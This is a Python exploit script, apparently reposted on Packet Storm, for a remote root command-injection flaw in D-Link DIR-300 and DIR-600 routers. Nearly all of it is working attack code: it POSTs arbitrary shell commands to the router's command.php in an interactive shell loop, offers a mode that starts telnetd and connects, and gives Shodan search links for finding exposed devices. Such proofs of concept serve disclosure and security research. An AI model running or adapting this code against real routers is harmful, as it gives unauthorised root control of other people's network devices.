This exploit demonstrates the remote root vulnerability discovered by Michael Messner in D-Link DIR-300 and DIR-600 devices.
838e77a770f310592d0086570fd3486761116a8c97ae1aa49719f77441d5b192#!/usr/bin/python
# D-LINK TOTAL FAIL
# http://www.s3cur1ty.de/m1adv2013-003
# Another Shit PoC by infodox
# SHODANS BELOW
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
# Who knew a shell could be so easy?
import sys
import requests
import os
if len(sys.argv) != 3:
print "Usage: ./dlinkroot.py <target> <mode>"
print "Modes: shell or telnetenable"
print "I was lazy so I assume you have a telnet client"
sys.exit(0)
target = sys.argv[1]
mode = sys.argv[2]
def shell(target):
print "[+] Connecting and spawning a shell..."
while True:
try:
bobcat = raw_input("%s:~# " %(target))
lulz = "cmd=%s;" %(bobcat)
url = "http://" + target + "/command.php"
hax = requests.post(url, lulz)
print hax.text
except KeyboardInterrupt:
print "\n[-] Quitting"
sys.exit(1)
def telnetenable(target):
lulz = "cmd=telnetd;"
url = "http://" + target + "/command.php"
print "[+] Trying to enable telnet"
try:
hax = requests.post(url, lulz)
print hax.text
except Exception:
print "[-] IT FAILED IT!"
sys.exit(0)
print "[+] Doing a telnet"
try:
os.system('telnet %s') %(target)
except Exception:
print "[-] IT FAILED IT!"
sys.exit(1)
if mode == "shell":
shell(target)
elif mode == "telnetenable":
telnetenable(target)
else:
print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed